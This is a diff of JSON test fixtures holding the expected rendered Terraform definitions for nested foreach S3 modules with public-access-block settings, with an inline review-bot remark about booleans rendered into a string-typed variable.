- "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket"
+ ]
 }
 }
 }
@@ -363,30 +545,32 @@
 "variable": [
 {
 "bucket2": {
+ "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].bucket2",
 "__end_line__": 16,
 "__start_line__": 14,
 "type": [
 "string"
- ],
- "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].bucket2"
+ ]
 }
 }
 ]
 },
- "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": {
+ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": {
 "locals": [
 {
+ "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].bucket2",
 "bucket2": [
- "var.bucket2"
- ],
- "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].bucket2"
+ ""
+ ]
 }
 ],
 "resource": [
 {
 "aws_s3_bucket_public_access_block": {
 "var_bucket": {
+ "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket",
 "__end_line__": 11,
+ "__provider_address__": "",
 "__start_line__": 5,
 "block_public_acls": [
 true
@@ -395,15 +579,14 @@
 true
 ],
 "bucket": [
- "var.bucket2"
+ ""
 ],
 "ignore_public_acls": [
 true
 ],
 "restrict_public_buckets": [
 true
- ],
- "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket"
+ ]
 }
 }
 }
@@ -411,30 +594,32 @@
 "variable": [
 {
 "bucket2": {
+ "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].bucket2",
 "__end_line__": 16,
 "__start_line__": 14,
 "type": [
 "string"
- ],
- "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].bucket2"
+ ]
 }
 }
 ]
 },
- "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": {
+ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": {
 "locals": [
 {
+ "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].bucket2",
 "bucket2": [
- "var.bucket2"
- ],
- "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].bucket2"
+ ""
+ ]
 }
 ],
 "resource": [
 {
 "aws_s3_bucket_public_access_block": {
 "var_bucket": {
+ "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket",
 "__end_line__": 11,
+ "__provider_address__": "",
 "__start_line__": 5,
 "block_public_acls": [
 true
@@ -443,15 +628,14 @@
 true
 ],
 "bucket": [
- "var.bucket2"
+ ""
 ],
 "ignore_public_acls": [
 true
 ],
 "restrict_public_buckets": [
 true
- ],
- "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket"
+ ]
 }
 }
 }
@@ -459,147 +643,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/variable.tf\", \"tf_source_modules\": null}": { - "variable": [ - { - "count_var": { - "__end_line__": 4, - "__start_line__": 2, - "default": [ - 2 - ], - "__address__": "count_var" - } - }, - { - "foreach_var": { - "__end_line__": 8, - "__start_line__": 6, - "default": [ - [ - "a", - "b" - ] - ], - "__address__": "foreach_var" - } - } - ] - }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}": { - "module": [ - { - "inner_s3_module[\"c\"]": { - "__end_line__": 5, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" - ], - "__start_line__": 1, - "bucket2": [ - "var.bucket" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module[\"b\"].inner_s3_module[\"c\"]" - } - }, - { - "inner_s3_module2[\"e\"]": { - "__end_line__": 11, - "__resolved__": [ - "{\"file_path\": 
\".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" - ], - "__start_line__": 7, - "bucket2": [ - "var.bucket2" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module[\"b\"].inner_s3_module2[\"e\"]" - } - }, - { - "inner_s3_module[\"d\"]": { - "__end_line__": 5, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" - ], - "__start_line__": 1, - "bucket2": [ - "var.bucket" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module[\"b\"].inner_s3_module[\"d\"]" - } - }, - { - "inner_s3_module2[\"f\"]": { - "__end_line__": 11, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": 
\"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" - ], - "__start_line__": 7, - "bucket2": [ - "var.bucket2" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module[\"b\"].inner_s3_module2[\"f\"]" - } - } - ], - "variable": [ - { - "bucket": { - "__end_line__": 16, - "__start_line__": 14, - "type": [ - "string" - ], - "__address__": "module.s3_module[\"b\"].bucket" - } - }, - { - "bucket2": { - "__end_line__": 20, - "__start_line__": 18, - "type": [ - "string" - ], - "__address__": "module.s3_module[\"b\"].bucket2" - } - } - ] - }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].bucket2" + false + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": 
"module.s3_module[\"a\"].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -608,15 +677,14 @@ true ], "bucket": [ - "var.bucket2" + false ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } 
@@ -624,30 +692,32 @@
 "variable": [
 {
 "bucket2": {
+ "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].bucket2",
 "__end_line__": 16,
 "__start_line__": 14,
 "type": [
 "string"
- ],
- "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].bucket2"
+ ]
 }
 }
 ]
 },
- "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": {
+ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": {
 "locals": [
 {
+ "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].bucket2",
 "bucket2": [
- "var.bucket2"
- ],
- "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].bucket2"
+ false
+ ]
 }
 ],
 "resource": [
 {
 "aws_s3_bucket_public_access_block": {
 "var_bucket": {
+ "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket",
 "__end_line__": 11,
+ "__provider_address__": "",
 "__start_line__": 5,
 "block_public_acls": [
 true
@@ -656,15 +726,14 @@
 true
 ],
 "bucket": [
- "var.bucket2"
+ false
 ],
 "ignore_public_acls": [
 true
 ],
 "restrict_public_buckets": [
 true
- ],
- "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket"
+ ]
 }
 }
 }
@@ -672,120 +741,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}": { - "module": [ - { - "inner_s3_module[\"c\"]": { - "__end_line__": 5, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" - ], - "__start_line__": 1, - "bucket2": [ - "var.bucket" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module2[1].inner_s3_module[\"c\"]" - } - }, - { - "inner_s3_module2[\"e\"]": { - "__end_line__": 11, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": 
null}}}" - ], - "__start_line__": 7, - "bucket2": [ - "var.bucket2" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module2[1].inner_s3_module2[\"e\"]" - } - }, - { - "inner_s3_module[\"d\"]": { - "__end_line__": 5, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" - ], - "__start_line__": 1, - "bucket2": [ - "var.bucket" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module2[1].inner_s3_module[\"d\"]" - } - }, - { - "inner_s3_module2[\"f\"]": { - "__end_line__": 11, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" - ], - "__start_line__": 7, - "bucket2": [ - "var.bucket2" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module2[1].inner_s3_module2[\"f\"]" - } - } - ], - "variable": [ - { - "bucket": { - "__end_line__": 16, - "__start_line__": 14, - "type": [ - "string" - ], - "__address__": "module.s3_module2[1].bucket" - } - }, - { - "bucket2": { - "__end_line__": 20, - "__start_line__": 18, - "type": [ - "string" - ], - "__address__": 
"module.s3_module2[1].bucket2" - } - } - ] - }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -794,15 +775,14 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } 
@@ -810,30 +790,32 @@
 "variable": [
 {
 "bucket2": {
+ "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].bucket2",
 "__end_line__": 16,
 "__start_line__": 14,
 "type": [
 "string"
- ],
- "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].bucket2"
+ ]
 }
 }
 ]
 },
- "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": {
+ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": {
 "locals": [
 {
+ "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].bucket2",
 "bucket2": [
- "var.bucket2"
- ],
- "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].bucket2"
+ ""
+ ]
 }
 ],
 "resource": [
 {
 "aws_s3_bucket_public_access_block": {
 "var_bucket": {
+ "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket",
 "__end_line__": 11,
+ "__provider_address__": "",
 "__start_line__": 5,
 "block_public_acls": [
 true
@@ -842,15 +824,14 @@
 true
 ],
 "bucket": [
- "var.bucket2"
+ ""
 ],
 "ignore_public_acls": [
 true
 ],
 "restrict_public_buckets": [
 true
- ],
- "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket"
+ ]
 }
 }
 }
@@ -858,30 +839,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true 
@@ -890,15 +873,14 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } 
@@ -906,30 +888,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true 
@@ -938,15 +922,14 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } 
@@ -954,30 +937,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].bucket2" + true + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true 
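Review bot: The rendered `bucket2` local for `module.s3_module2[0].module.inner_s3_module2["e"]` is pinned to the bare boolean `true` (`"bucket2": [ true ]`), while the variable it came from is declared `"type": [ "string" ]` a few lines later in the same hunk; Terraform would coerce a boolean argument to a string-typed variable into the string `"true"`, so unless the renderer deliberately preserves the HCL literal type, this fixture may be codifying a rendering quirk rather than the intended value. The same pattern recurs in the following hunks of this file (`@@ -986,15 +971,14 @@` through `@@ -1226,15 +1216,14 @@`) and, as `false` replacing `var.bucket`, in the hunks of expected_foreach_modules_tf_definitions.json starting at `@@ -107,7 +107,7 @@`. If keeping the raw literal is intended, a one-line comment in the test that regenerates these fixtures, stating that rendered values are not coerced to the declared variable type, would stop the next regeneration from being read as a regression.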
@@ -986,15 +971,14 @@ true ], "bucket": [ - "var.bucket2" + true ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } 
@@ -1002,30 +986,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].bucket2" + true + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true 
